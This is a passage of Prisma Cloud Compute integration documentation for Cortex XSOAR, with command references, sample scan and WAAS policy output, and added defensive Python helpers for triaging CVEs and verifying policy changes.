| PrismaCloudCompute.ReportHostScan.vulnerabilitiesCount | Number | Total number of vulnerabilities. |
| PrismaCloudCompute.ReportHostScan.vulnerabilityDistribution | Unknown | The number of vulnerabilities per severity. |
| PrismaCloudCompute.ReportHostScan.vulnerabilityRiskScore | Number | The host's CVE risk score. |
| PrismaCloudCompute.ReportHostScan.wildFireUsage | Unknown | The WildFire usage stats. The period for the usage varies with the context. |
| PrismaCloudCompute.ReportHostScan.complianceIssuesCount | Number | Total number of compliance issues. |

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=false limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": [
{
"templates": [
"GDPR"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 16,
"severity": "high",
"title": "(CIS_Docker_CE_v1.1.0 - 1.4) Only allow trusted users to control Docker daemon",
"packageVersion": "",
"cause": "1 users in docker group: demisto",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "Docker allows you to share a directory between the Docker host and a guest container\nwithout limiting the access rights of the container. This means that you can start a\ncontainer and map the / directory on your host to the container. The container will then be\nable to alter your host file system without any restrictions. In simple terms, it means that\nyou can attain elevated privileges with just being a member of the docker group and then\nstarting a container with mapped / directory on the host",
"link": "",
"cri": false,
"riskFactors": null,
"type": "host_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
},
{
"templates": [
"PCI",
"HIPAA"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 21,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 2.1) Restrict network traffic between containers",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "By default, all network traffic is allowed between containers on the same host on the\ndefault network bridge. If not desired, restrict all the inter-container communication. Link\nspecific containers together that require communication. Alternatively, you can create\ncustom network and only join containers that need to communicate to that custom\nnetwork",
"link": "",
"cri": false,
"riskFactors": null,
"type": "daemon_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": null,
"packageManager": true,
"repoDigests": [],
"allCompliance": {},
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "kbd",
"version": "1.15.5-1ubuntu5",
"cveCount": 5,
"license": "GPL-2+",
"layerTime": 0
},
{
"name": "xdg-utils",
"version": "1.1.1-1ubuntu1.16.04.5",
"cveCount": 50,
"license": "",
"layerTime": 0
}
]
}
],
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [],
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": [],
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 20,
"path": "",
"version": "17.06.0-ce",
"layerTime": 0,
"name": "docker"
}
],
"osDistroRelease": "xenial",
"osDistroVersion": "16.04",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"text": "",
"discovered": "2020-11-04T18:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "low",
"title": "",
"packageVersion": "4.9.3-0ubuntu0.16.04.1",
"cause": "",
"cvss": 7.5,
"status": "needed",
"twistlock": false,
"fixDate": "",
"description": "The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-8037",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "tcpdump",
"functionLayer": "",
"published": 1604513700,
"cve": "CVE-2020-8037"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"text": "",
"discovered": "2021-04-29T05:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "medium",
"title": "",
"packageVersion": "1.17.1-1ubuntu1.5",
"cause": "",
"cvss": 6.1,
"status": "deferred",
"twistlock": false,
"fixDate": "",
"description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2021/CVE-2021-31879",
"cri": false,
"riskFactors": {
"Medium severity": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "wget",
"functionLayer": "",
"published": 1619673300,
"cve": "CVE-2021-31879"
}
],
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": [
{
"services": [
"lxcfs"
],
"path": "/usr/bin/lxcfs",
"cveCount": 0,
"name": "lxcfs",
"md5": ""
},
{
"services": [
"systemd-udevd"
],
"path": "/lib/systemd/systemd-udevd",
"cveCount": 0,
"name": "systemd-udevd",
"md5": ""
}
],
"vulnerabilityRiskScore": 47909,
"history": []
}
}
}

Human Readable Output#

Host description#

| Hostname | Docker Version | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- | --- |
| host123 | 17.06.0-ce | Ubuntu 16.04.2 LTS | 191 | 17 |

Vulnerabilities#

| Cve | Description | Severity | Package Name | Status |
| --- | --- | --- | --- | --- |
| CVE-2020-8037 | The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory. | low | tcpdump | needed |
| CVE-2021-31879 | GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007. | medium | wget | deferred |

Compliances#

| Id | Severity | Description |
| --- | --- | --- |
| 16 | high | Docker allows you to share a directory between the Docker host and a guest container without limiting the access rights of the container. This means that you can start a container and map the / directory on your host to the container. The container will then be able to alter your host file system without any restrictions. In simple terms, it means that you can attain elevated privileges with just being a member of the docker group and then starting a container with mapped / directory on the host |
| 21 | high | By default, all network traffic is allowed between containers on the same host on the default network bridge. If not desired, restrict all the inter-container communication. Link specific containers together that require communication. Alternatively, you can create custom network and only join containers that need to communicate to that custom network |

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=true limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": null,
"repoTag": null,
"packageManager": false,
"repoDigests": [],
"allCompliance": {},
"packages": null,
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": null,
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": null,
"osDistroRelease": "xenial",
"osDistroVersion": "",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": null,
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 47909,
"history": null
}
}
}

Human Readable Output#

Host description#

| Hostname | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- |
| host123 | Ubuntu 16.04.2 LTS | 191 | 17 |

Vulnerability Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 0 | 4 | 78 | 109 |

Compliance Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 1 | 16 | 0 | 0 |
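As an added example (not part of the integration or of this page), the following Python helpers consume a PrismaCloudCompute.ReportHostScan entry of the shape shown above and pull out what a playbook usually needs next: the fixable CVEs, the deferred ones, compliance issues grouped by template, a consistency check of the per-severity buckets, and findings whose Prisma severity disagrees with their CVSS band (the tcpdump entry above is rated low while carrying CVSS 7.5, because Prisma follows the distro's rating). The sample report is constructed from the fields of the example; the busybox entry is borrowed from the image scan example to show a "fixed in ..." status; all function names are the author's own.

```python
"""Triage helpers for one PrismaCloudCompute.ReportHostScan context entry."""
from __future__ import annotations

import json
from typing import Any

# Constructed sample, trimmed to the fields these helpers read. Field names and
# values follow the host scan context example on this page; the busybox entry is
# borrowed from the image scan example to show a "fixed in ..." status.
SAMPLE_REPORT: dict[str, Any] = {
    "_id": "host123",
    "hostname": "host123",
    "vulnerabilitiesCount": 191,
    "vulnerabilityDistribution": {"critical": 0, "high": 4, "medium": 78, "low": 109, "total": 191},
    "complianceIssuesCount": 17,
    "complianceIssues": [
        {"id": 16, "severity": "high", "templates": ["GDPR"],
         "title": "(CIS_Docker_CE_v1.1.0 - 1.4) Only allow trusted users to control Docker daemon"},
        {"id": 21, "severity": "high", "templates": ["PCI", "HIPAA"],
         "title": "(CIS_Docker_v1.2.0 - 2.1) Restrict network traffic between containers"},
    ],
    "vulnerabilities": [
        {"cve": "CVE-2020-8037", "severity": "low", "cvss": 7.5, "status": "needed",
         "packageName": "tcpdump", "riskFactors": {"Attack vector: network": {}}},
        {"cve": "CVE-2021-31879", "severity": "medium", "cvss": 6.1, "status": "deferred",
         "packageName": "wget", "riskFactors": {"Medium severity": {}}},
        {"cve": "CVE-2018-20679", "severity": "high", "cvss": 7.5, "status": "fixed in 1.30.1-r5",
         "packageName": "busybox", "riskFactors": {"Has fix": {}}},
    ],
}

SEVERITIES = ("critical", "high", "medium", "low")


def vulnerabilities(report: dict) -> list[dict]:
    # With compact=true the command returns "vulnerabilities": null, so guard the iteration.
    return report.get("vulnerabilities") or []


def fixable(report: dict) -> list[dict]:
    """Findings with an upstream fix: a 'Has fix' risk factor or a 'fixed in ...' status."""
    return [v for v in vulnerabilities(report)
            if "Has fix" in (v.get("riskFactors") or {})
            or str(v.get("status", "")).startswith("fixed in")]


def cvss_band(score: float) -> str:
    """CVSS v3.x qualitative rating for a base score."""
    if score >= 9.0:
        return "critical"
    if score >= 7.0:
        return "high"
    if score >= 4.0:
        return "medium"
    return "low" if score > 0 else "none"


def severity_cvss_mismatches(report: dict) -> list[tuple[str, str, float]]:
    """Findings whose Prisma severity (vendor/distro rating) disagrees with the CVSS band.

    A playbook that filters on severity alone would drop CVE-2020-8037 ('low', CVSS 7.5),
    so surface such rows explicitly instead of letting them disappear."""
    return [(v["cve"], v["severity"], v["cvss"]) for v in vulnerabilities(report)
            if v.get("cvss") and cvss_band(v["cvss"]) != v.get("severity")]


def distribution_consistent(report: dict) -> bool:
    """Cross-check the per-severity buckets against 'total' and vulnerabilitiesCount."""
    dist = report.get("vulnerabilityDistribution") or {}
    bucket_sum = sum(int(dist.get(s, 0)) for s in SEVERITIES)
    return bucket_sum == dist.get("total") == report.get("vulnerabilitiesCount")


def compliance_by_template(report: dict) -> dict[str, list[int]]:
    """Group compliance issue IDs by the template (PCI, HIPAA, GDPR, ...) they belong to."""
    grouped: dict[str, list[int]] = {}
    for issue in report.get("complianceIssues") or []:
        for template in issue.get("templates") or ["(none)"]:
            grouped.setdefault(template, []).append(issue["id"])
    return grouped


def triage(report: dict) -> dict[str, Any]:
    """One summary object a playbook can set into context or render as a table."""
    vulns = vulnerabilities(report)
    return {
        "host": report.get("hostname") or report.get("_id"),
        "compact_output": report.get("vulnerabilities") is None,
        "fixable_cves": sorted(v["cve"] for v in fixable(report)),
        "deferred_cves": sorted(v["cve"] for v in vulns if v.get("status") == "deferred"),
        "severity_mismatches": severity_cvss_mismatches(report),
        "distribution_consistent": distribution_consistent(report),
        "compliance_by_template": compliance_by_template(report),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_REPORT), indent=2))
```

The compact_output flag matters in practice: a compact=true report has vulnerabilities, complianceIssues, packages and binaries set to null, so a playbook that needs per-CVE detail must re-run the command with compact=false rather than treat the empty lists as a clean host.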

prisma-cloud-compute-vulnerabilities-impacted-resources-list#


Get the resources (images, hosts, and functions) impacted by the given CVEs.

Base Command#

prisma-cloud-compute-vulnerabilities-impacted-resources-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cve | A comma-separated list of CVE IDs to use as the pivot for the impacted resource search. For example cve=CVE-2018-14600,CVE-2021-31535. | Optional |
| limit | The maximum number of impacted host/image records to return. Default is 50. | Optional |
| offset | The offset by which to begin listing impacted host/image records. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.VulnerabilitiesImpactedResource._id | String | The CVE ID (the index for the impacted resources). |
| PrismaCloudCompute.VulnerabilitiesImpactedResource.functions | Unknown | The mapping between the function ID and its details. |
| PrismaCloudCompute.VulnerabilitiesImpactedResource.hosts | String | The list of impacted hosts. |
| PrismaCloudCompute.VulnerabilitiesImpactedResource.riskTree | Unknown | The risk tree associated with the CVE ID, keyed by image digest. |

Command Example#

!prisma-cloud-compute-vulnerabilities-impacted-resources-list cve=CVE-2021-31535,CVE-2018-14600

Context Example#

{
"PrismaCloudCompute": {
"VulnerabilitiesImpactedResource": [
{
"_id": "CVE-2021-31535",
"hosts": [
"host1"
],
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image1",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image2",
"factors": {}
}
]
}
},
{
"_id": "CVE-2018-14600",
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image3",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image4",
"factors": {}
}
]
}
}
]
}
}

Human Readable Output#

Impacted Images#

| Cve | Image |
| --- | --- |
| CVE-2021-31535 | image1 |
| CVE-2021-31535 | image2 |
| CVE-2018-14600 | image3 |
| CVE-2018-14600 | image4 |

Impacted Hosts#

| Cve | Hostname |
| --- | --- |
| CVE-2021-31535 | host1 |
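The two Human Readable tables above are a flattening of the riskTree (keyed by image digest) and hosts fields of each entry. As an added example, not code from the integration, here is that flattening in Python together with the inverse index (resource to CVEs) that an enrichment step usually needs when an alert names a specific image or host. The sample data is constructed from the context example, with shortened placeholder digests; function names are the author's own.

```python
"""Flatten PrismaCloudCompute.VulnerabilitiesImpactedResource entries into per-resource rows."""
from __future__ import annotations

# Constructed sample in the shape of the context example above; digests are shortened
# placeholders for readability and are not real image digests.
SAMPLE_IMPACTED: list[dict] = [
    {
        "_id": "CVE-2021-31535",
        "hosts": ["host1"],
        "riskTree": {
            "sha256:c24dea8e...": [{"image": "image1", "factors": {}}],
            "sha256:dccfc7e8...": [{"image": "image2", "factors": {}}],
        },
    },
    {
        # No "hosts" key at all: the command omits it when no host is impacted.
        "_id": "CVE-2018-14600",
        "riskTree": {
            "sha256:c24dea8e...": [{"image": "image3", "factors": {}}],
            "sha256:dccfc7e8...": [{"image": "image4", "factors": {}}],
        },
    },
]


def impacted_images(entries: list[dict]) -> list[tuple[str, str]]:
    """(cve, image) rows in the order the Human Readable Output lists them, without duplicates.

    riskTree maps each image digest to a list of image nodes; the same digest can show up
    under several CVEs, so de-duplicate on the (cve, image) pair rather than on the digest."""
    rows: list[tuple[str, str]] = []
    seen: set[tuple[str, str]] = set()
    for entry in entries:
        for nodes in (entry.get("riskTree") or {}).values():
            for node in nodes:
                row = (entry["_id"], node.get("image", ""))
                if row[1] and row not in seen:
                    seen.add(row)
                    rows.append(row)
    return rows


def impacted_hosts(entries: list[dict]) -> list[tuple[str, str]]:
    """(cve, hostname) rows; tolerates entries that carry no hosts key."""
    rows: list[tuple[str, str]] = []
    for entry in entries:
        for host in entry.get("hosts") or []:
            if (entry["_id"], host) not in rows:
                rows.append((entry["_id"], host))
    return rows


def cves_by_resource(entries: list[dict]) -> dict[str, list[str]]:
    """Inverse index: resource name (image or host) -> sorted list of CVE IDs.

    This is the lookup an incident usually needs: given the image or host named in an
    alert, which of the CVEs we pivoted on affect it."""
    index: dict[str, set[str]] = {}
    for cve, name in impacted_images(entries) + impacted_hosts(entries):
        index.setdefault(name, set()).add(cve)
    return {name: sorted(cves) for name, cves in index.items()}


if __name__ == "__main__":
    for cve, image in impacted_images(SAMPLE_IMPACTED):
        print(f"{cve}\t{image}")
    print(cves_by_resource(SAMPLE_IMPACTED))
```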

prisma-cloud-compute-get-waas-policies#


Get the WAAS container policies (Defend > WAAS > Containers in the Prisma Cloud Compute console).

Base Command#

prisma-cloud-compute-get-waas-policies

Input#

There are no input arguments for this command.

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Policies.Name | String | The WAAS policy rule name. |
| PrismaCloudCompute.Policies.WaasPolicy.ATP | String | The configured action (ban, prevent, alert, allow, disable, or reCAPTCHA) for advanced threat protection (ATP). |
| PrismaCloudCompute.Policies.WaasPolicy.CodeInjection | String | The configured action for code injection detection. |
| PrismaCloudCompute.Policies.WaasPolicy.SQLInjection | String | The configured action for SQL injection detection. |
| PrismaCloudCompute.Policies.WaasPolicy.DetectInformationLeakage | String | The configured action for information leakage detection. |
| PrismaCloudCompute.Policies.WaasPolicy.CrossSiteScriptingXSS | String | The configured action for cross-site scripting (XSS) detection. |
| PrismaCloudCompute.Policies.WaasPolicy.OSCommandInjetion | String | The configured action for OS command injection detection (the context key keeps this spelling). |
| PrismaCloudCompute.Policies.WaasPolicy.AttackToolsAndVulnScanners | String | The configured action for attack tools and vulnerability scanners. |
| PrismaCloudCompute.Policies.WaasPolicy.LocalFileInclusion | String | The configured action for local file inclusion detection. |
| PrismaCloudCompute.Policies.WaasPolicy.Shellshock | String | The configured action for Shellshock detection. |
| PrismaCloudCompute.Policies.WaasPolicy.MalformedHTTPRequest | String | The configured action for malformed HTTP requests. |

Command example#

!prisma-cloud-compute-get-waas-policies

Context Example#

{
"PrismaCloudCompute": {
"Policies": {
"Name": "dvwa",
"WaasPolicy": [
{
"ATP": "alert",
"AttackToolsAndVulnScanners": "alert",
"CodeInjection": "alert",
"CrossSiteScriptingXSS": "alert",
"DetectInformationLeakage": "alert",
"LocalFileInclusion": "alert",
"MalformedHTTPRequest": "alert",
"OSCommandInjetion": "alert",
"SQLInjection": "ban",
"Shellshock": "alert"
}
]
}
}
}

Human Readable Output#

dvwa#

| ATP | AttackToolsAndVulnScanners | CodeInjection | CrossSiteScriptingXSS | DetectInformationLeakage | LocalFileInclusion | MalformedHTTPRequest | OSCommandInjetion | SQLInjection | Shellshock |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| alert | alert | alert | alert | alert | alert | alert | alert | ban | alert |

prisma-cloud-compute-update-waas-policies#


Update the action for one attack type in a WAAS container policy rule.

Base Command#

prisma-cloud-compute-update-waas-policies

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| policy | The complete policy object. Get it by running prisma-cloud-compute-get-waas-policies raw-response=true extend-context=PCC=. | Required |
| attack_type | The specific protection to update. Possible values are: sqli, xss, cmdi, codeInjection, lfi, attackTools, shellshock, malformedReq, advancedProtectionEffect, intelGathering. | Required |
| action | The new policy action for the attack type. Possible values are: ban, prevent, alert, allow, disable, reCAPTCHA. | Required |
| rule_name | The name of the WAAS policy rule to update. | Required |

Context Output#

There is no context output for this command.

Human Readable Output#

Successfully updated the WaaS policy
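Because the update command returns no context, the only way to confirm that the change landed (and that nothing else moved) is to run prisma-cloud-compute-get-waas-policies again and compare the two snapshots. The following added Python example (not part of the integration) validates attack_type and action against the tables above, predicts the post-update snapshot, diffs two snapshots, and flags controls that were downgraded. The mapping from attack_type values to context keys and the restrictiveness ordering of actions are the author's assumptions and are marked as such in the code; the snapshot is constructed from the context example above.

```python
"""Guard-rails around prisma-cloud-compute-update-waas-policies: validate the request,
predict the resulting policy snapshot, and diff it against what get-waas-policies returns."""
from __future__ import annotations

import copy

# Allowed values of the update command's `action` argument, from the table above.
ALLOWED_ACTIONS = {"ban", "prevent", "alert", "allow", "disable", "reCAPTCHA"}

# Assumed mapping from the update command's `attack_type` values to the context keys that
# prisma-cloud-compute-get-waas-policies returns. Inferred from the two lists on this page,
# not taken from the integration's source code.
ATTACK_TYPE_TO_KEY = {
    "sqli": "SQLInjection",
    "xss": "CrossSiteScriptingXSS",
    "cmdi": "OSCommandInjetion",  # sic: the context key is spelled this way
    "codeInjection": "CodeInjection",
    "lfi": "LocalFileInclusion",
    "attackTools": "AttackToolsAndVulnScanners",
    "shellshock": "Shellshock",
    "malformedReq": "MalformedHTTPRequest",
    "advancedProtectionEffect": "ATP",
    "intelGathering": "DetectInformationLeakage",
}

# Assumed ordering from least to most restrictive effect, used only to flag downgrades.
# reCAPTCHA is a challenge rather than a verdict, so it is deliberately left unranked.
STRENGTH = {"disable": 0, "allow": 1, "alert": 2, "prevent": 3, "ban": 4}

# Constructed snapshot in the shape of the PrismaCloudCompute.Policies context example above.
BEFORE = {"Name": "dvwa", "WaasPolicy": [{
    "ATP": "alert", "AttackToolsAndVulnScanners": "alert", "CodeInjection": "alert",
    "CrossSiteScriptingXSS": "alert", "DetectInformationLeakage": "alert",
    "LocalFileInclusion": "alert", "MalformedHTTPRequest": "alert",
    "OSCommandInjetion": "alert", "SQLInjection": "ban", "Shellshock": "alert",
}]}


def validate_update(attack_type: str, action: str) -> str:
    """Reject bad arguments before the command is issued; returns the context key to watch."""
    if attack_type not in ATTACK_TYPE_TO_KEY:
        raise ValueError(f"unknown attack_type {attack_type!r}; expected one of {sorted(ATTACK_TYPE_TO_KEY)}")
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"unknown action {action!r}; expected one of {sorted(ALLOWED_ACTIONS)}")
    return ATTACK_TYPE_TO_KEY[attack_type]


def apply_locally(policy: dict, attack_type: str, action: str) -> dict:
    """The snapshot we expect get-waas-policies to return after the update (input left untouched)."""
    key = validate_update(attack_type, action)
    expected = copy.deepcopy(policy)
    for spec in expected["WaasPolicy"]:
        spec[key] = action
    return expected


def diff_policies(before: dict, after: dict) -> dict[str, tuple]:
    """{control: (old_action, new_action)} for every control that changed between two snapshots."""
    changes: dict[str, tuple] = {}
    for old, new in zip(before["WaasPolicy"], after["WaasPolicy"]):
        for key in sorted(set(old) | set(new)):
            if old.get(key) != new.get(key):
                changes[key] = (old.get(key), new.get(key))
    return changes


def verify_update(before: dict, after: dict, attack_type: str, action: str) -> bool:
    """True only if the requested control now has the requested action and nothing else moved."""
    key = validate_update(attack_type, action)
    applied = all(spec.get(key) == action for spec in after["WaasPolicy"])
    unexpected = [k for k in diff_policies(before, after) if k != key]
    return applied and not unexpected


def weakened_controls(before: dict, after: dict) -> list[str]:
    """Controls whose action moved to a less restrictive effect (for example ban -> alert)."""
    return [key for key, (old, new) in diff_policies(before, after).items()
            if old in STRENGTH and new in STRENGTH and STRENGTH[new] < STRENGTH[old]]


if __name__ == "__main__":
    after = apply_locally(BEFORE, "xss", "prevent")
    print(diff_policies(BEFORE, after))  # {'CrossSiteScriptingXSS': ('alert', 'prevent')}
    print(verify_update(BEFORE, after, "xss", "prevent"))  # True
    print(weakened_controls(BEFORE, apply_locally(BEFORE, "sqli", "alert")))  # ['SQLInjection']
```

In a playbook, the "after" snapshot comes from a second get-waas-policies run rather than from apply_locally; weakened_controls is the check to put behind a manual approval step, since a mistyped action can silently move a control from ban to alert.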

prisma-cloud-compute-get-audit-firewall-container-alerts#


Get the WAAS (firewall) audit events recorded for a container image.

Base Command#

prisma-cloud-compute-get-audit-firewall-container-alerts

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| ImageName | The image name to get the alerts for. | Required |
| FromDays | The number of days back to look. | Optional |
| audit_type | The type of audit alert to retrieve (for example, lfi). | Required |

Context Output#

There is no context output for this command.

Command example#

!prisma-cloud-compute-get-audit-firewall-container-alerts audit_type=lfi ImageName=vulnerables/web-dvwa:latest

Human Readable Output#

Audits#

No entries.

Known limitations:#

When Cortex XSOAR fetches an incident from the Prisma Cloud Compute platform, the platform deletes the fetched alert. Configure only one integration instance per user to fetch incidents; if several instances fetch with the same user, each one sees only the alerts it happened to pull first.

prisma-cloud-compute-get-alert-profiles#


Get the available alert profiles from a specific project.

Base Command#

prisma-cloud-compute-get-alert-profiles

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| project | The project to get the alert profiles for. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.AlertProfiles.Cortex.Application | String | The alert profile application. |
| PrismaCloudCompute.AlertProfiles.Cortex.CredentialId | String | The credential ID. |
| PrismaCloudCompute.AlertProfiles.Cortex.Enabled | Boolean | Whether the Cortex alert profile is enabled. |
| PrismaCloudCompute.AlertProfiles.Cortex.Url | String | The alert profile URL. |
| PrismaCloudCompute.AlertProfiles.Email.CredentialId | String | The email alert profile credential ID. |
| PrismaCloudCompute.AlertProfiles.Email.Enabled | Boolean | Whether the email alert profile is enabled. |
| PrismaCloudCompute.AlertProfiles.Email.From | String | The sender address of the email alert profile. |
| PrismaCloudCompute.AlertProfiles.Email.Port | Number | The SMTP port of the email alert profile. |
| PrismaCloudCompute.AlertProfiles.Email.SmtpAddress | String | The SMTP server address. |
| PrismaCloudCompute.AlertProfiles.Email.Ssl | Boolean | Whether the email alert profile uses SSL. |
| PrismaCloudCompute.AlertProfiles.GcpPubsub.CredentialId | String | The credential ID. |
| PrismaCloudCompute.AlertProfiles.GcpPubsub.Enabled | Boolean | Whether the GCP Pub/Sub alert profile is enabled. |
| PrismaCloudCompute.AlertProfiles.GcpPubsub.Topic | String | The GCP Pub/Sub topic. |
| PrismaCloudCompute.AlertProfiles.Jira.BaseUrl | String | The Jira base URL. |
| PrismaCloudCompute.AlertProfiles.Jira.CaCert | String | The CA certificate used for the Jira connection. |
| PrismaCloudCompute.AlertProfiles.Jira.CredentialId | String | The Jira credential ID. |
| PrismaCloudCompute.AlertProfiles.Jira.Enabled | Boolean | Whether the Jira alert profile is enabled. |
| PrismaCloudCompute.AlertProfiles.Jira.IssueType | String | The Jira issue type. |
| PrismaCloudCompute.AlertProfiles.Jira.Priority | String | The Jira priority. |
| PrismaCloudCompute.AlertProfiles.LastError | String | The last error reported for the alert profile. |
| PrismaCloudCompute.AlertProfiles.Modified | Date | The time the alert profile was last modified. |
| PrismaCloudCompute.AlertProfiles.Name | String | The alert profile name. |
| PrismaCloudCompute.AlertProfiles.Owner | String | The alert profile owner. |
| PrismaCloudCompute.AlertProfiles.Pagerduty.RoutingKey.Encrypted | String | The PagerDuty routing key (stored encrypted). |
| PrismaCloudCompute.AlertProfiles.Pagerduty.Severity | String | The PagerDuty severity. |
| PrismaCloudCompute.AlertProfiles.Pagerduty.Summary | String | The PagerDuty summary. |
| PrismaCloudCompute.AlertProfiles.Policy.Admission.AllRules | Boolean | Whether the admission alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Admission.Enabled | Boolean | Whether the admission alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.AllRules | Boolean | Whether the agentless app firewall alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.Enabled | Boolean | Whether the agentless app firewall alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.AllRules | Boolean | Whether the app-embedded app firewall alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.Enabled | Boolean | Whether the app-embedded app firewall alert trigger is enabled. |
